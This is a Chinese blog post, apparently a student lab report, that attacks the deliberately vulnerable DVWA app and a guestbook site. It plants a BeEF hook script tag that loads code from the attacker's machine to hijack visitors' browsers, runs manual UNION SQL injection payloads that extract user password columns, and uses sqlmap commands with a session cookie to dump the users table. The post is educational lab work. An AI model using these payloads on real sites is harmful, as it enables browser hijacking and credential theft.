DVWA:SQL;留言簿:XSS

已于 2022-08-04 18:29:24 修改
阅读量255 收藏
点赞数
分类专栏: 数据结构 文章标签: 安全
于 2020-11-24 22:19:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50034496/article/details/110085060
版权

XSS和SQL注入


实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

2、 Kali使用beef生成恶意代码,截图。
在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

,截图。

在这里插入图片描述

<script src="http://Kali的ip:3000/hook.js"></script>

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

在这里插入图片描述
在这里插入图片描述

自动跳转到淘宝
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

DVWA(low)+SQLmap+Mysql注入实战

注入点发现

判断是否有注入漏洞以及注入类型
表单输入1’,显示如下:表示输入的语句被后台执行了,则存在注入漏洞

在mysql中,如果等号两边类型不一致,则会发生强制转换,当数字与字符串数据比较时,字符串转换为数字再进行比较,由此判断是否是字符型注入
在这里插入图片描述

在这里插入图片描述

手工注入

1.判断字段

如下结果,表示字段数为2

1' order by 3# 
1' order by 2#

在这里插入图片描述
在这里插入图片描述

2.union 查询

2.1:查询当前版本,数据库名称
1' union select version(),datsbase()# wp:1’ 闭合掉前边的单引号,#注释后边的单引号

在这里插入图片描述:
2.2:查询当前数据库下的表名

-1' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa'#

在这里插入图片描述
2.3:查询users表下的列名

1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

在这里插入图片描述
2.4:获取数据

id=-1' union select user,password from users#

在这里插入图片描述

工具注入

2.枚举当前使用的数据库名称和用户名

sqlmap语法参数:
-u :指定目标URL,即注入点
–cookies:当前会话的cookies值
-b:获取数据库类型,检索数据库管理系统标识
–current-db:获取当前数据库
–current-user:获取当前登录数据库使用的用户

sqlmap -u '192.168.195.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=3cb60f04c78b07242273c6432349f363' -b --current-db --current-user

在这里插入图片描述

3.枚举数据库用户名和密码

sqlmap -u '192.168.195.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=3cb60f04c78b07242273c6432349f363' -D dvwa --string="Surname" --users --password

在这里插入图片描述

4:枚举数据库和指定数据库的数据表

数据库

sqlmap -u "http://192.168.195.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=3cb60f04c78b07242273c6432349f363' --string="Surname" --dbs

在这里插入图片描述
表名

sqlmap -u "http://192.168.195.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=3cb60f04c78b07242273c6432349f363' --string="Surname" -D dvwa --tables

在这里插入图片描述

5.获取指定数据库和表中所有列的信息

sqlmap语法参数:
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息
命令:

sqlmap -u "http://192.168.195.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=3cb60f04c78b07242273c6432349f363' --string="Surname" -D dvwa -T users --columns

在这里插入图片描述

6枚举指定数据表中的所有用户名与密码,并down到本地

-C:枚举数据表中的列
–dump:存储数据表项

命令:
sqlmap -u “http://192.168.195.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#” --cookie=‘security=low; PHPSESSID=3cb60f04c78b07242273c6432349f363’ --string=“Surname” -D dvwa -T users -C user,password --dump

在这里插入图片描述

是小桑呢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS留言板实现
极客剑寮
02-21 1258
XSS留言板实现 XSS 留言板实现-笔记 预备知识 XSS漏洞 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS最...
实验三 XSSSQL注入
m0_62685257的博客
11-21 661
实验三 XSSSQL注入
保姆级渗透测试入门教程(非常详细),从零基础入门到精通,从看这篇开始!
最新发布
xx16755498986的博客
06-05 788
渗透测试:指的是试图利用系统、网络、人力资源或实物资产中的弱点或漏洞,以对安全控制的有效性进行压力测试。
了解与防御XSS攻击
zhouzuoluo的博客
02-05 371
一. XSS是什么 XSS攻击全称跨站脚本攻击(Cross Site Scripting),是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。“XSS本质是在于执行脚本(javascript/html等),而一个javascript就可以让你黑遍整个世界”。 二. XSS的危害 盗取用户Co...
xss跨站脚本攻击
开心星人的博客
02-26 6426
概述: 主要指攻击者可以再页面中插入恶意脚本代码,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份、钓鱼、传播恶意代码和控制用户浏览器等行为 产生原因: 由于web程序对用户的输入过滤不足、,导致用户输入的恶意HTML/Javascript 代码注入到网页中,混淆原有语义,产生新的恶意语句。在其他用户访问网页时,浏览器就会触发恶意的网页代码,从而达到XSS攻击的目的 分类: 反射型:恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击 输入: 输
网络渗透测试实验三
qq_62623325的博客
11-24 963
网络渗透测试实验三
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
dvwa:dvwa教学版
03-07
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。警告! 该死的漏洞Web应用程序...
DVWA:该死的易受攻击的Web应用程序(DVWA
02-05
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。警告! 该死的漏洞Web应用程序...
DVWA:该死的易受攻击的Web应用程序(DVWA
05-10
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。 警告! 该死的易受攻击的Web...
dvwa:该死的脆弱的网络应用
03-16
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。警告! 该死的易受攻击的Web...
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 3万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
XSS攻击
gghhb12的博客
03-29 4610
XSS攻击
渗透测试概述与流程
weixin_59872639的博客
01-12 1万+
渗透测试概述 渗透测试是一种通过模拟攻击的技术与方法,挫败目标系统的安全控制措施并获得控制访问权的安全测试方法。 网络渗透测试主要依据CVE已经发现的安全漏洞,模拟入侵者的攻击方法对网站应用、服务器系统和网络设备进行非破坏性质的攻击性测试。 CVE CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。 渗透测试的目的 侵入系统获取机密信息,并将入侵的过程和细节产生报告提供给用户,由此确定用户系统存在的安全威胁,并能提醒安全管理员完善安全策略,降低安全
『渗透测试基础』| 什么是渗透测试?有哪些常用方法?如何开展?测试工具有哪些?优势在哪里?
虫无涯的博客
12-04 3798
渗透测试是指由专业的安全人员模拟黑客,从系统可能存在的漏洞位置进行攻击测试,找到隐藏的安全漏洞,从而达到保护系统安全的目的;书中有一个例子说的非常不错:把软件系统比喻一座房子,房子建好后会配备一些安全措施,比如防盗门、安全警报等。一般情况,我们认为这已经足够安全,但我们不能十分确认入侵者会使用怎样的方式找到漏洞,从而攻击我们的安全防线。为了保护房子足够安全,我们会聘请外部的安全专家进行一系列的检测,比如检测防盗门是否牢固,窗户是否容易被侵入等等,发现这个房子是否存在漏洞,确保房子的安全性。
什么是渗透测试,多方面为你详细介绍
m0_59236602的博客
03-03 2197
渗透测试(Penetration Testing)是由具备高技能和高素质的安全服务人员发起、并模拟常见黑客所使用的攻击手段对目标系统进行模拟入侵。渗透测试服务的目的在于充分挖掘和暴露系统的弱点,从而让管理人员了解其系统所面临的威胁。通常评估方法对评估结果更具全面性,而渗透测试更注重安全漏洞的严重性。渗透测试工作往往作为风险评估的一个重要环节,为风险评估提供重要的原始参考数据。
什么是渗透测试
m0_59236602的博客
03-03 2553
渗透测试(也称为pen test)是针对计算机系统的模拟网络攻击,以检查可利用的漏洞。在Web应用程序安全性的上下文中,渗透测试通常用于增强Web应用程序防火墙(WAF)。Pen testing可能涉及企图破坏任何数量的应用程序系统(例如,应用程序协议接口(API),前端/后端服务器)以发现漏洞,例如容易受到代码注入攻击的未经过滤的输入。渗透测试提供的见解可用于调整WAF安全策略并修补检测到的漏洞#渗透测试阶段pen testing 过程可以分为五个阶段。
【渗透测试】最详细的介绍和流程方法(建议收藏)
2301_77472496的博客
06-08 3302
渗透测试就是模拟攻击者入侵系统,对系统进行一步步地渗透,发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固,提升系统的安全性,防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试,就是违法行为!
渗透测试概述·什么是渗透测试
liuhyusb的博客
08-31 1204
渗透测试(penetration test,pentest)是实施安全评估(即审计)的具体手段。渗透测试可能是单独进行的一项工作,也可能是常规研发生命周期(例如,Microsoft SDLC)里 IT 安全风险管理的一个组成部分。产品的安全性并不完全取决于 IT 方面的技术因素,还会受到与该产品有关的最佳安全实践的影响。具体而言,增强产品安全性的工作涉及安全需求分析、风险分析、威胁建模、代码审查和运营安全。通常认为,渗透测试是安全评估最终的也是最具侵犯性的形式,它必须由符合资质的专业人士实施。
DVWA 1.9 SQL注入详解:新手教程与实战步骤
"这篇教程主要关注SQL注入漏洞的讲解,基于最新版本的DVWA 1.9,并提供了针对新手的教程。DVWA是一个用于安全脆弱性评估的PHP/MySQL Web应用,具有多个安全级别,包括Low、Medium、High和Impossible。文章介绍了SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值